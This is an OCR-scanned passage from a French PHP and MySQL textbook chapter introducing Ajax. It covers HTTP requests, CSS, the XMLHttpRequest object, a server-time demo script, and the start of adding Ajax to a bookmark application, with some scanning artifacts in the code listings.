Generalement, la programmation Ajax produit une interface utilisateur plus propre et 
plus rapide pour les applications interactives - pensez aux interfaces de Facebook, 
Flickr et autres reseaux sociaux qui sont le fer de lance du Web 2.0. Ces applications 
permettent aux utilisateurs d'effectuer de nombreuses taches sans avoir besoin de 
recharger ou de reafficher des pages entieres, et c'est la qu'Ajax entre en scene. La 
programmation cote client demande un peu de programmation cote serveur, mais seule 
une zone precise est affichee dans le navigateur et c'est done la seule qui doit etre reaf- 
fichee. Ce comportement imite done celui des applications autonomes, mais dans un 
environnement web. 

Un exemple classique est celui d'un tableur sur une machine non connectee, compare a 
un tableau sur un site web. Avec le tableur, l'utilisateur peut modifier une seule cellule 
pour que les formules modifient toutes les autres ou trier une colonne, tout cela sans 
quitter 1' interface initiale. Dans un environnement web statique, cliquer sur un lien pour 
trier une colonne necessiterait l'envoi d'une requete au serveur, qui renverrait sa 
reponse au navigateur, et celui-ci devrait ensuite reafficher la page. Dans un environne- 
ment web Ajax, ce tableau pourrait etre trie en fonction de la demande de l'utilisateur, 
mais sans devoir recharger la page entiere. 

Dans les sections qui suivent, nous etudierons les differentes technologies mises en 
ceuvre par Ajax. Comme ces informations ne sont pas exhaustives, nous vous indique- 
rons les ressources que vous pourrez consulter pour en savoir plus. 

Requetes et responses HTTP 

HTTP (Hypertext Transfer Protocol) est un standard Internet qui definit le moyen 
par lequel des serveurs web et des navigateurs web peuvent communiquer les uns 
avec les autres. Lorsqu'un utilisateur demande une page web en tapant son URL 
dans la barre de navigation de son navigateur ou en suivant un lien, en soumettant un 
formulaire ou en effectuant une operation qui le mene ailleurs, le navigateur cree 
une requete HTTP. 

Cette requete est envoy ee a un serveur web qui renvoie une reponse. Pour que cette 
reponse soit comprehensible, la requete doit avoir ete correctement formatee. 
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Avec Ajax, connaitre le format des requetes et des reponses est un point essentiel car 
c'est le developpeur qui a la responsabilite d'ecrire ces requetes et d'attendre certains 
resultats dans 1' application. 

Lorsqu'il cree une requete HTTP, le client envoie les informations au format suivant : 

■ Une ligne d'introduction contenant la methode, le chemin vers la ressource demandee 
et la version du protocole utilisee, comme ici : 

GET http: //server/phpmysql4e/chapitre32/test.html HTTP/1.1 

■ Les autres methodes les plus employees sont POST et HEAD. 

■ Des lignes d'en-tetes facultatives, au format parametre: valeur. Par exemple : 

User-agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; 
rv:1.9.0.1) Gecko/2008070208 Firef ox/3 . . 1 

Et/ou 

Accept: text/plain, text/html 

Pour connaitre la liste de tous les en-tetes HTTP, consultez la page http:// 
www.w3.org/Protocols/rfc2616/. 

■ Une ligne blanche. 

■ Un corps de message facultatif. 

Apres l'envoi d'une requete HTTP, le client devrait recevoir une reponse HTTP au 
format suivant : 

■ Une ligne d'introduction, ou ligne d'etat, qui contient la version du protocole HTTP 
utilisee par le serveur et un code d'etat, comme ici : 

HTTP/1 .1 200 OK 

Le premier chiffre du code d'etat (ici, le 2 de 200) donne un indice sur la reponse : 
les codes commencant par 1 indiquent des informations, ceux commencant par 2, un 
succes, ceux commencant par 3, une redirection, ceux commencant par 4, une erreur 
du client (la ressource demandee n'existe pas, par exemple) et ceux commencant 
par 5, une erreur du serveur (le script est mal forme, par exemple). 

Pour connaitre la liste des codes d'etat de HTTP, consultez la page http:// 
www.w3.org/Protocols/rfc2616/. 

■ Des lignes d'en-tetes facultatives, au format parametre: valeur, comme ici : 
Server: Apache/2.2.9 

Last-Modified: Fri, 1 Aug 2008 15:34:59 GMT 
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DHTML et XHTML 

DHTML (Dynamic HTML) designe la combinaison de HTML statique, des feuilles 
de style CSS et de JavaScript pour manipuler le DOM (Document Object Model) arm de 
modifier l'apparence d'une page statique apres le chargement de tous ses elements. Au 
premier abord, cette fonctionnalite semble done ressembler a ce que fait Ajax et, par 
certains cotes, elle est similaire. Mais la difference se situe dans le fait qu'avec ce 
dernier le client et le serveur sont connectes de maniere asynchrone (d'ou le "A" de 
Ajax). 

Bien qu'un site DHTML puisse montrer un certain dynamisme a l'aide de menus 
deroulants ou d'elements de formulaires qui changent en fonction de certains choix, 
toutes les donnees de ces elements ont deja ete recuperees. Si, par exemple, vous avez 
contju un site DHTML qui affiche la premiere section d'un texte lorsque l'utilisateur 
passe sur un lien ou un bouton et la deuxieme section de ce texte lorsqu'il passe sur un 
autre texte ou un autre bouton, ces deux sections auront deja ete chargees par le naviga- 
teur. Le developpeur devra simplement utiliser un peu de JavaScript pour que l'attribut 
CSS qui commande la visibilite soit active ou non. Avec Ajax, les zones reservees a la 
premiere ou a la deuxieme section ne seront generalement remplies qu'en fonction du 
resultat d'un appel de script distant sur le serveur, tandis que le reste du site restera 
statique. 

XHTML (Extensible Hypertext Markup Language) fonctionne comme HTML et 
DHTML car tous les trois servent a baliser du contenu pour l'afficher via un client 
(navigateur, telephone ou autre assistant personnel) et pour permettre 1' integration de 
CSS afm d'en controler la presentation. Les differences entre XHTML et HTML tien- 
nent au fait que XHTML respecte la syntaxe de XML et qu'un document XHTML peut 
etre interprets avec des outils XML en plus des outils de navigation web classiques. 

Les elements et les attributs XHTML s'ecrivent entierement en minuscules 
(<head></head> au lieu de <HEAD></HEAD> et href au lieu de HREF, par exemple). En 
outre, toutes les valeurs d' attributs doivent etre placees entre apostrophes doubles ou 
simples et tous les elements doivent etre explicitement fermes, que ce soit par une balise 
fermante ou par une notation speciale pour les elements vides, comme <img /> ou <br/>. 

Pour plus d' informations sur XHTML, consultez la page http://www.w3.org/TR/ 
xhtmll/. 

CSS 

Les CSS (Cascading Style Sheets ou "feuilles de style en cascade") servent a preciser 
un peu plus l'affichage des pages statiques, dynamiques ou Ajax. Grace a elles, il suffit 
que le developpeur modifie la definition d'une balise, d'une classe ou d'un identifiant 
au sein d'un seul document (la feuille de style) pour que les modifications prennent 
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immediatement effet dans toutes les pages qui sont liees a cette feuille de style. Ces 
definitions, ou regies, respectent un format specifique qui utilise des selecteurs, des 
declarations et des valeurs. 

■ Les selecteurs sont des noms de balises HTML, comme body ou hi (titre de section 
de niveau 1). 

■ Les declarations sont les proprietes du style, comme background ou font size. 

■ Les valeurs sont attributes aux declarations, comme white ou 1 2pt. 

La feuille de style suivante, par exemple, definit le corps d'un document comme ay ant 
un fond blanc, le texte en graisse normale, sur 12 points avec une police Verdana ou 
sans serif : 

body { 

background: white [or #fff or #ffffff]; 
font-family: Verdana, sans-serif; 
font-size: 12pt; 
font-weight: normal; 

} 

Ces valeurs s'appliqueront a la page jusqu'a ce qu'un element ayant son propre style 
defini dans la feuille de style apparaisse. Lorsqu'il lira un element hi , par exemple, le client 
affichera son texte comme il a ete defini, probablement avec une police superieure a 
12 points et avec une valeur de font weight a bold. 

Outre les selecteurs, une feuille de style peut egalement definir des classes et des iden- 
tifiants. Grace aux classes (qui peuvent etre utilisees sur plusieurs elements d'une page) 
ou aux identifiants (qui ne peuvent servir qu'une seule fois par page), vous pouvez 
encore affiner l'affichage et la fonctionnalite des elements de votre site. Cette ameliora- 
tion est tout specialement importante pour les sites Ajax car on y utilise des zones 
predefinies du document pour afficher les nouvelles informations obtenues par 1' execution 
d'un script distant. 

On definit les classes comme les selecteurs, avec des accolades autour des definitions et 
en separant les definitions par des points-virgules. Voici, par exemple, la definition 
d'une classe nominee ajaxarea : 

.ajaxarea { 

width: 400px; 
height: 400px; 
background: #fff; 
border: 1px solid #000; 

} 

Ici, la classe a j axarea appliquee a un conteneur div produira un carre de 400 pixels de 
large par 400 pixels de haut, avec un fond blanc et un fin contour noir : 

<div class="ajaxarea"H/n texte</div> 
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L' utilisation la plus frequente des feuilles de style consiste a creer un fichier a part 
contenant toutes les definitions de styles, puis a le lier dans l'element head d'un document 
HTML, comme ici : 

<head> 

<link rel="stylesheet" href="the_style_sheet.css" type="text/css"> 
</head> 

Pour plus d'informations sur les CSS, consultez la page http://www.w3.org/TR/CSS2/. 
Programmation cote client 

La programmation cote client a lieu dans le navigateur web, apres qu'il a entierement 
recupere une page a partir d'un serveur web. Toutes les fonctions de programmation 
sont contenues dans les donnees recuperees du serveur et attendent qu'on les active. 
Parmi les actions classiques qui s'executent cote client, citons l'affichage ou le 
masquage de zones de textes ou d' images, la modification des couleurs, de la taille du 
texte ou de l'emplacement du texte et des images, des calculs varies et la validation des 
donnees saisies par l'utilisateur avant d'envoyer un formulaire qui sera traite cote 
serveur. 

Le langage de script cote client le plus connu est JavaScript (le "J" de Ajax). VBScript 
est egalement un langage de script cote client, mais il est specifique aux plates-formes 
Microsoft et est done deconseille si vous souhaitez creer un environnement ouvert 
pouvant impliquer differents systemes d' exploitation et differents navigateurs. 

Programmation cote serveur 

La programmation cote serveur inclut tous les scripts situes sur un serveur web, qui sont 
interpretes ou compiles avant d'envoyer la reponse au client. Cette programmation 
comprend generalement des connexions du serveur a un SGBDR : les requetes et les 
reponses de celui-ci font done partie des scripts eux-memes. 

Ces scripts peuvent etre dents dans n'importe quel langage oriente serveur comme Perl, 
JSP, ASP ou PHP (nous utiliserons ce dernier dans les exemples de ce chapitre pour des 
raisons evidentes). La reponse d'un script cote serveur consistant generalement a affi- 
cher des donnees balisees avec une variante de HTML, 1' environnement de l'utilisateur 
importe peu. 

XMLet XSLT 

Nous avons presente XML au Chapitre 3 1 en presentant rapidement son format, sa 
structure et son utilisation. Dans le contexte des applications Ajax, XML (le "X" de 
Ajax) sert a echanger les donnees, tandis que XSLT est utilise pour les manipuler. 
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Les donnees elles-memes sont envoyees via (ou recuperees a partir de) 1' application 
Ajax. 

Pour plus d' informations sur XML, consultez la page http://www.w3.org/XML/ et, 
pour XSL, la page http://www.w3.org/TR/xslt20/. 

Presentation d'Ajax 

Maintenant que nous connaissons toutes les composantes possibles d'une application 
Ajax, nous pouvons les rassembler pour produire un exemple fonctionnel de cette techno- 
logic N'oubliez pas la raison essentielle d'utiliser Ajax : produire des sites interactifs 
qui repondent aux actions des utilisateurs, mais sans provoquer d' interruption due au 
reaffichage de toute une page. 

Pour parvenir a ce but, une application Ajax comprend une couche supplementaire de 
traitement qui intervient entre la page web demandee et le serveur responsable de la 
production de cette page. Cette couche est generalement appelee un Framework Ajax 
(ou un moteur Ajax). Son role consiste a prendre en charge les requetes entre l'utilisa- 
teur et le serveur et a communiquer les requetes et les reponses sans ajouter d' actions 
supplementaires comme le reaffichage d'une page et sans interruption des operations 
que l'utilisateur est en train de realiser. 

Dans les sections qui suivent, nous verrons comment les differentes parties d'une appli- 
cation Ajax collaborent pour produire ce resultat. 

L'objet XMLHTTPRequest 

Plus haut dans ce chapitre, nous avons presente les requetes et les reponses HTTP et 
montre comment la programmation cote client pouvait etre utilisee dans une application 
Ajax. L'objet JavaScript XMLHTTPRequest est un element essentiel pour se connecter au 
serveur web et creer une requete sans recharger entierement la page initiale. 

— Info 

Pour des raisons de securite, l'objet XMLHTTPRequest ne peut appeler que des URL dans le 
meme domaine que lui ; il ne peut pas directement appeler un serveur distant. 



L'objet XMLHTTPRequest est souvent considere comme les "tripes" d'une application 
Ajax car il sert de passerelle entre la requete du client et la reponse du serveur. Meme si 
vous apprendrez bientot comment creer et utiliser une instance de XMLHTTPRequest, 
vous pouvez deja lire la page http://www.w3.org/TR/XMLHttpRequest/ pour mieux 
comprendre son fonctionnement. 
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L'objet XMLHTTPRequest aplusieurs attributs, presentes dans le Tableau 32.1. 
Tableau 32.1 : Attributs de l'objet XMLHTTPRequest 



Attribut 

onreadystatechange 

readyState 

responseText 
responseXml 
status 
statusText 



Description 

Indique la fonction qui devra etre appelee lorsque la propriete 
readyState est modifiee. 

L'etat de la requete, represente par les entiers (non initialisee), 
1 (chargement), 2 (chargee), 3 (interactive) et 4 (terminee). 

Contient les donnees sous la forme d'une chaine de caracteres. 

Contient les donnees sous la forme d'un document XML. 

Code d'etat HTTP renvoye par le serveur, comme 200. 

Phrase d'etat HTTP renvoyee par le serveur, comme OK. 



II possede egalement plusieurs methodes, derates dans le Tableau 32.2. 
Tableau 32.2 : Methodes de l'objet XMLHTTPRequest 



Methode 


Description 


abort ( ) 


Arrete la requete. 


getAHResponseHeaders ( ) 


Renvoie tous les en-tetes de la reponse dans une chaine. 


getResponseHeader (entete) 


Renvoie la valeur de l'en-tete entete dans une chaine. 


open ( 'methode ' , 'URL', 


Precise la methode HTTP methode (comme POST ou GET), 


'a') 


1'UPvL cible URL et si la requete doit etre asynchrone (a vaut 




alors 1 true 1 ) ou non (a vaut 'false')- 


send(contenu) 


Envoie la requete avec un eventuel contenu POST. 


setRequestHeader( 'x' , 


Initialise une paire parametre (x) et valeur (y) et 1' envoie comme 




en-tete avec la requete. 



Avant d'utiliser les fonctionnalites de XMLHTTPRequest, vous devez d'abord en creer 
une instance, ce qui necessite un peu plus de travail que la simple ligne suivante : 

var request = new XMLHTTPRequest () ; 

En effet, cette ligne fonctionne avec tous les navigateurs, sauf avec Internet Explorer, or 
il est preferable que notre code convienne a tout le monde. Par consequent, la solution 
consiste a ecrire le code JavaScript suivant pour creer une nouvelle instance de XMLHTT 
PRequest pour tous les navigateurs : 
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function getXMLHTTPRequest ( ) { 
var req = false; 
try { 

/* Pour Firefox */ 

req = new XMLHttpRequest ( ) ; 
} catch (err) { 

try { 

/* Pour certaines versions de IE */ 
req = new ActiveXOb j ect ( "Msxml2.XMLHTTP" ) ; 
} catch (err) { 
try { 

/* Pour d'autres versions de IE */ 
req = new ActiveXOb] ect ( "Microsoft . XMLHTTP" ) ; 
} catch (err) { 
req = false; 

} 

} 

} 

return req; 

} 

Si vous placez ce code JavaScript dans un fichier appele ajax_functions.js sur votre 
serveur web, vous aurez pose la premiere pierre d'une bibliotheque de fonctions Ajax. 

Pour creer une instance de XMLHTTPRequest dans une application Ajax, il suffit 
d'inclure le fichier contenant vos fonctions : 

<script src="ajax_f unctions . js" type= "text /JavaScript "></script> 

puis d'appeler ce nouvel objet et de continuer l'ecriture de votre programme : 

<script type=" text /JavaScript "> 
var myReq = getXMLHTTPRequest () ; 
</script> 

Dans la section suivante, nous allons ajouter une nouvelle piece du puzzle au fichier des 
fonctions Ajax. 

Communication avec le serveur 

L'exemple de la section precedente a permis de creer un nouvel objet XMLHTTPRequest 
mais vous ne l'avez pas encore utilise pour communiquer. Dans l'exemple qui suit, 
nous allons creer une fonction JavaScript qui envoie une requete au serveur, plus preci- 
sement a un script nomine servertime.php. 

function getServerTime ( ) { 

var thePage = 'servertime.php'; 

myRand = parselnt (Math . random( ) *999999999999999) ; 

var theURL = thePage +"?rand="+myRand; 

myReq .open ( "GET" , theURL, true); 

myReq. onreadystatechange = theHTTPResponse ; 

myReq. send(null) ; 

} 
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La premiere ligne de cette fonction cree une variable nominee thePage en lui affectant 
la valeur servertime.php, c'est-a-dire le nom du script PHP qui se trouve sur le 
serveur. 

La ligne suivante peut sembler deplacee puisqu'elle cree un nombre aleatoire. La ques- 
tion qui nous vient immediatement a l'esprit est : "Quel est le rapport entre un nombre 
aleatoire et l'heure du serveur ?" La reponse est que cela n'a aucun effet direct sur le 
script lui-meme. Ce nombre aleatoire est ajoute a l'URL dans la troisieme ligne de la 
fonction pour eviter un eventuel probleme lorsque le navigateur (ou un proxy) met en 
cache la requete. Si cette URL etait simplement http://votreserveur/votrescript.php, 
le resultat pourrait etre mis en cache alors que, si elle est de la forme http://votreser- 
veur/votrescript.php?rand=randval, il n'y a rien a mettre en cache puisque cette 
URL sera differente a chaque fois, bien que la fonctionnalite du script sous-jacent soit 
identique. 

Les trois dernieres lignes de la fonction utilisent trois methodes (open, onreadystate 
change et send) de l'instance de XMLHTTPRequest creee par l'appel a getXMLHTTP 
Request ( ) dans la section precedente. 

Dans la ligne qui utilise la methode open, les parametres sont : le type de la requete 
(GET), l'URL (theURL) et la valeur true indiquant que la requete doit etre asynchrone. 

Avec la ligne utilisant la methode onreadystatechange, la fonction appellera une 
nouvelle fonction, theHTTPResponse, lorsque l'etat de l'objet sera modifie. 

Dans la ligne qui utilise la methode send, la fonction envoie le contenu NULL au script 
qui s' execute sur le serveur. 

Creons maintenant un fichier servertime.php contenant le code du Listing 32.1. 
Listing 32.1 : Contenu de servertime.php 

<?php 

header( 'Content-Type: text/xml' ) ; 
echo "<?xml version=\ " 1 . 0\ " ?> 
<clock> 

<timestring>It is " .date ( 1 H : i : s 1 ) . " on ". 
date('M d, Y ').".< / timestring> 
</clock>" ; 

?> 



Ce script recupere l'heure et la date courantes du serveur a l'aide de la fonction date ( ) 
de PHP et renvoie sa valeur dans une chaine encodee en XML. En fait, date ( ) est appe- 
lee deux fois : une fois comme date ( ' H : i : s ' ) , qui renvoie l'heure, les minutes et les 
secondes de l'heure courante du serveur sur vingt-quatre heures et une fois comme 
date('M d, Y 1 ), qui renvoie le mois, le jour et l'annee. 
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La chaine produite ressemblera a celle-ci (les elements entre crochets seront remplaces 
par de vraies valeurs) : 

<?xml version="1 .0" ?> 
<clock> 

<timestring> 

It is [heure] on [date] . 

</timestring> 
</clock> 

Dans la section suivante, nous creerons la fonction theHTTPResponse ( ) et nous utiliserons 
la reponse du script PHP du serveur. 

Utilisation de la reponse du serveur 

La fonction getServerTime( ) de la section precedente est prete a appeler theHTTPRes 
ponse() et a traiter la chaine qu'elle lui renverra. Lexemple suivant interprete la 
reponse et cree une chaine qui sera affichee a l'utilisateur final : 

function theHTTPResponse ( ) { 
if (myReq . readyState == 4) { 
if (myReq. status == 200) { 
van timeString = 

myReq. responseXML . getElementsByTagName ( "timestring" ) [0] ; 
document . get Element By Id ( ' showtime ' ) . innerHTML = 
timeString.childNodes[0] . nodeValue; 

} 

} else { 

document . get Element By Id ( ' showtime ' ) . innerHTML = 
'<img src="ajax-loader.gif "/>' ; 

} 

} 

L'instruction if ...else la plus externe verifie l'etat de l'objet : s'il est different de 4 
(termine), elle affiche une animation (<img src="ajax loader.gif" />). Si l'etat vaut 
4, il faut encore verifier si le code de reponse du serveur vaut 200 (OK). 

Si le code de reponse vaut 200, on cree une nouvelle variable, timeString, qui est 
initialisee avec la valeur de l'element timestring du document XML envoye par le 
script cote serveur. Cet element est recupere par la methode getElementByTagname( ) 
de la reponse : 

var timeString = 

myReq . responseXML . getElementsByTagName ( "timestring" ) [0] ; 

L'etape suivante consiste a afficher la valeur dans une zone definie par CSS dans le 
fichier HTML. Ici, cette valeur s'affichera dans l'element showtime du document : 

document . get Element By Id ( ' showtime ' ) . innerHTML = 
timeString . childNodes [0] . nodeValue ; 

Notre script ajaxjunctions.js est done complet. Son code est presente dans le 
Listing 32.2. 
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Listing 32.2 : Contenu de ajaxjunctions.js 



function getXMLHTTPRequest ( ) { 
var req = false; 
try { 

/* Pour Firefox */ 

req = new XMLHttpRequest ( ) ; 
} catch (err) { 

try { 

/* Pour certaines versions de IE */ 
req = new ActiveXOb j ect ( "Msxml2.XMLHTTP" ) ; 
} catch (err) { 
try { 

/* Pour d'autres versions de IE */ 
req = new ActiveXOb] ect ( "Microsoft . XMLHTTP" ) ; 
} catch (err) { 
req = false; 

} 

} 

} 

return req; 

} 

function getServerTime ( ) { 

var thePage = ' servertime . php ' ; 

myRand = parselnt (Math . random( ) *999999999999999) ; 
var theURL = thePage +"?rand="+myRand ; 
myReq .open ( "GET" , theURL, true); 
myReq.onreadystatechange = theHTTPResponse ; 
myReq. send(null) ; 

} 

function theHTTPResponse ( ) { 
if (myReq . readyState == 4) { 
if (myReq. status == 200) { 
var timeString = 

myReq. responseXML . getElementsByTagName ( "timestring" ) [0] ; 
document . get Element By Id ( ' showtime ' ) . innerHTML = 
timeString .childNodes[0] . nodeValue; 

} 

} else { 

document . getElementBy Id ( ' showtime ' ) . innerHTML = 
'<img src="ajax-loader.gif "/>' ; 

} 

} 



Dans la section suivante, nous terminerons le document HTML et nous reunirons tous 
les composants pour creer une application Ajax. 
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Rassemblement des composants 

Comme on l'a explique, Ajax est une combinaison de technologies. Dans les sections 
precedentes, nous avons utilise JavaScript et PHP, c'est-a-dire une programmation cote 
client et cote serveur, pour creer une requete HTTP et recevoir une reponse. La piece 
manquante du puzzle est la partie qui prend en charge l'affichage : l'utilisation de 
XHTML et de CSS pour produire le resultat que verra l'utilisateur. 

Le Listing 32.3 montre le contenu du fichier qjaxServerTime.html, qui contient les 
entrees de la feuille de style, et les appels a JavaScript, qui invoquent le script PHP et 
recuperent la reponse du serveur. 

Listing 32.3 : Contenu de ajaxServerTime.html 



<!D0CTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional/ /EN " "http:// 
www . w3 . org/TR/xhtml1 /DTD/xhtml1 -transitional .dtd "> 
<html xmlns="http: //www. w3.org/1999/xhtml" xml:lang="en" 
dir="ltr" lang="en"> 

<head> 

<style> 
body { 

background: #fff; 

font-family: Verdana, sans-serif; 

font-size: 12pt; 

font-weight: normal; 

} 

.displaybox { 
width: 300px; 
height: 50px; 
background -color : #f f f f f f ; 
border:2px solid #000000; 
line-height: 2.5em; 
margin-top: 25px; 
font-size: 12pt; 
font-weight: bold; 

} 

</style> 

<script src="ajax_f unctions . j s" type= "text /JavaScript "></script> 
<script type=" text /JavaScript "> 
var myReq = getXMLHTTPRequest ( ) ; 
</script> 

</head> 

<body> 

<div align="center"> 

<h1>Ajax Demonstration</h1 > 

<p align="center">Place your mouse over the box below 
to get the current server time.<br/> 
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The page will not refresh; only the contents of the box 
will change. </p> 

<div id=" showtime" class="displaybox" 

onmouseover=" JavaScript : getServerTime ( ) ; "></div> 

</div> 

</body> 
</html> 



Ce code commence par une declaration XHTML suivie des balises ouvrantes <html> et 
<head>. Dans la partie head du document, on place les entrees de la feuille de style 
entre les balises <style> et </style>. Ici, on ne definit que deux styles : le format de 
tout ce qui se trouve dans la balise body et le format de l'element qui utilisera la classe 
displaybox. Cette classe definit une boite blanche de 300 pixels de largeur par 
50 pixels de hauteur avec un contour noir. En outre, le texte qu'elle contiendra sera en 
gras sur 12 points. 

Apres les entrees de style, la section head se poursuit par un lien vers la bibliotheque 
des fonctions JavaScript : 

<script src="ajax_f unctions . j s" type= "text /JavaScript "></script> 

Puis par la creation d'un nouvel objet XMLHTTPRequest appele myReq : 

<script type=" text /JavaScript "> 
var myReq = getXMLHTTPRequest ( ) ; 
</script> 

Apres la fermeture de l'element head, on passe a l'element body, qui ne contient que du 
XHTML. Dans un element div centre, on trouve le texte du titre de la page (Ajax 
Demonstration) ainsi que les instructions indiquant aux utilisateurs de placer leur souris 
sur la boite du dessous pour obtenir la date et l'heure courantes du serveur. 

C'est dans l'element div d'identifiant showtime que tout se passe, notamment dans le 
gestionnaire d'evenement onmouseover : 

<div id="showtime" class="displaybox" 
onmouseover="JavaScript : getServerTime ( ) ; "></div> 

L'utilisation de onmouseover signifie que l'entree de la souris de l'utilisateur dans la 
zone dermic par l'element div identifie par showtime provoquera l'appel de la fonction 
JavaScript getServerTime ( ). Cet appel adressera la requete au serveur qui repondra et 
le resultat apparaitra dans cet element div. 



Info 



La fonction JavaScript aurait pu etre appelee par d'autres moyens, par un evenement 
onclick sur un bouton de formulaire, par exemple. 
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Les Figures 32.1, 32.2 et 32.3 montrent la sequence d'evenements lorsque ces scripts 
sont en action. La page ajcixServerTime.html n'est jamais rechargee : seul le contenu de 
l'element div showtime Test. 



File Edit View History Bankmarks Tools Help 



_ - ' 1^^ i jjj | Q http://lacalha5t/ph prny[;ql4e/'chapterj4/ajaxServerTime.html 



Ajax Demonstration 

Place your mouse over the box below to get the current server time. 
The page will not refresh; only the contents of the box will change. 




Figure 32. 1 

Le chargement initial de ajaxServerTime.html montre les instructions et une boite vide. 
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Ajax Demonstration 

Place your mouse over the box below to get the current server time. 
The page will not refresh; only the contents of the box will change. 



□ □ne 



Figure 32.2 

L'utilisateur deplace sa souris sur la zone, ce qui lance la requete. L'icdne indique que I'objet est 
en cours de chargement. 
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Ajax Demonstration 

Place your mouse over the box below to get the current server time. 
The page will not refresh; only the contents of the box will change. 



It is 12:56:59 on Aug 04, 2008. 



Done 



Figure 32.3 

Le resultat du serveur est affiche dans /'element div appele showtime. Le deplacement de la souris 
sur la zone provoque un autre appel du script. 



Ajouter des elements Ajax a des projets existants 

Aucun des projets de la derniere partie de ce livre n'utilisait Ajax : chacun d'eux consis- 
tait en une serie de formulaires et de rechargements de pages. Bien que celles-ci 
contiennent des elements dynamiques, aucune ne beneficie des avantages du Web 2.0. 

Ajouter Ajax a ces projets aurait deplace 1' attention portee a la creation d' applications 
web avec PHP et MySQL. En d'autres termes, nous avons considere qu'il etait prefera- 
ble de savoir marcher avant d'apprendre a courir. Maintenant que vous savez courir ou, 
en tout cas, trottiner, vous pouvez envisager de modifier les elements de ces applica- 
tions pour inclure Ajax ou inclure des elements Ajax dans les nouvelles applications 
que vous creerez desormais. 

Un developpeur Ajax doit repondre a la question : "Quelles sont les differentes actions 
de l'utilisateur et quels evenements de pages ces actions doivent-elles impliquer ?" Est- 
ce que Ton veut, par exemple, que les utilisateurs soient toujours obliges de cliquer sur 
un bouton pour envoy er un formulaire et passer a l'etape suivante ou peuvent-ils 
simplement lancer une requete asynchrone au serveur web en passant d'un element de 
formulaire a 1' autre (un champ de saisie, une case a cocher, un bouton radio) ? Lorsque 
Ton a decide des types d' actions, on peut commencer par ecrire les fonctions JavaScript 
qui appelleront les scripts PHP permettant de gerer la requete et de produire la reponse 
du serveur. 
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Dans les sections qui suivent, nous ajouterons quelques elements Ajax a des scripts que 
nous avons deja crees dans ce livre. 

Aj outer des elements Ajax a PHPbookmark 

Au Chapitre 25, nous avons cree l'application PHPbookmark qui demandait aux 
utilisateurs de s'enregistrer et de s'authentifier avant de pouvoir sauvegarder leurs 
URL favorites et de beneficier de suggestions etablies a partir des favoris des autres 
utilisateurs. 

Cette application etant deja ecrite et etant formee de plusieurs scripts PHP et de biblio- 
theques de fonctions etroitement lies, la premiere etape consiste a reflechir a la facon 
d'ajouter des fichiers supplementaires a 1' ensemble, que ce soient des feuilles de style, 
des fonctions JavaScript ou des scripts PHP pour gerer les actions au niveau du serveur. 
La reponse est simple : il faut creer un fichier distinct pour les styles et un autre pour 
toutes les fonctions JavaScript. Puis on ajoutera du code aux scripts PHP existants ann 
qu'ils incluent ces fichiers externes lorsque cela est necessaire et pour qu'ils appellent 
les fonctions JavaScript elles-memes. 

Apres avoir decide de la facon de gerer ces nouveaux fichiers, il faut determiner les 
fonctions utilisateurs qui pourront beneficier d'un traitement Ajax. Meme si les parties 
inscription et authentification des utilisateurs auraient pu etre de bonnes candidates, 
nous avons prefere nous interesser a l'ajout et a la modification des favoris, car l'espace 
nous manque pour modifier l'integralite de l'application. 

Comme nous devrons modifier les fichiers existants de l'application, il est preferable de 
copier les fichiers du Chapitre 25 dans un nouveau repertoire que nous utiliserons ici. 

— Info 

Si vous vouliez ajouter un traitement Ajax a I'inscription des utilisateurs, vous pourriez appe- 
ler une fonction JavaScript pour qu'elle invoque un script PHP qui verifierait que I'adresse e- 
mail et le nom du nouvel inscrit n'existent pas deja sur le systeme. Cette fonction afficherait 
egalement une erreur et empecherait I'envoi du formulaire tant que ces erreurs n'ont pas 
ete corrigees. 



Creation des fichiers supplementaires 

Comme on l'a indique, il faudra ajouter de nouveaux fichiers a la structure de l'applica- 
tion existante. Meme si nous les remplirons au cours des sections qui suivent, il est 
preferable de prendre nos marques avant de poursuivre. 

Supposons que nous aurons besoin d'au moins deux nouveaux fichiers : une feuille de 
style et une bibliotheque de fonctions JavaScript. Nous allons les creer des maintenant 
en leur donnant, respectivement, les noms new_ss.css et new_ajax.js. La nouvelle 
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feuille de style {new_ss.css) peut etre vide puisque nous n'avons pas encore defini de 
style, mais le nchier new_ajax.js devrait contenir la fonction getXMLHTTPRequest ( ) que 
nous avons ecrite plus haut dans ce chapitre pour creer un objet XMLHTTPRequest 
reconnu par tous les navigateurs. Bien que nous modifiions encore ces fichiers, nous 
pouvons les deposer sur le serveur web des maintenant. 

L'etape suivante consiste a aj outer un lien vers ces fichiers dans l'une des fonctions 
d'affichage de PHPbookmark. Cela garantira que les styles de la feuille de style seront 
toujours disponibles, tout comme les fonctions de la bibliotheque JavaScript. Au Chapi- 
tre 25, la fonction qui controlait (entre autres) la production de l'element head du docu- 
ment HTML s'appelait do html header ( ) et se trouvait dans le fichier output Jhs.php. 

Le Listing 32.4 presente la nouvelle version de cette fonction. 

Listing 32.4 : Version modifiee de do_html_header(), contenant des liens vers la 
nouvelle feuille de style et la bibliotheque de fonctions JavaScript 



function do_html_header($title) { 
// Affiche un titre HTML 

?> 

<html> 
<head> 

<title><?php echo $title;?></title> 
<style> 

body { font-family: Arial, Helvetica, sans-serif; 

font-size: 13px; } 
li, td { font-family: Arial, Helvetica, sans-serif; 

font-size: 13px; } 
hr { color: #3333cc; } 
a { color: #000000; } 
</style> 

<link rel="stylesheet" type="text/css" href="new_ss.css"/> 
<script src="new_ajax. js" type="text/JavaScript "></script> 

</head> 
<body> 

<img src="bookmark.gif " alt="PHPbookmark logo" border="0" 

align="left" valign="bottom" height="55" width="57" /> 
<h1>PHPbookmark</h1> 
<hr /> 
<?php 

if($title) { 

do_html_heading($title) ; 

} 

} 
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Si vous avez depose sur le serveur la nouvelle feuille de style, la bibliotheque de fonc- 
tions JavaScript, le fichier output _fns.php modifie et que vous ouvriez une page du 
systeme PHPbookmark, ces fichiers ne devraient pas causer d'erreur lors de leur inclu- 
sion. Nous allons maintenant placer des styles et des scripts dans ces fichiers et creer 
quelques fonctionnalites Ajax. 

Ajout de favoris avec Ajax 

Actuellement, on n'ajoute un favori que lorsque l'utilisateur entre l'URL du favori et 
clique sur le bouton d'envoi du formulaire. Ce clic provoque l'appel d'un autre script 
PHP qui ajoute le favori, renvoie a l'utilisateur la liste de ses favoris et montre qu'il a 
ete ajoute. En d'autres termes, les pages sont rechargees. 

L'approche Ajax consiste a presenter le formulaire pour ajouter un favori mais, plutot 
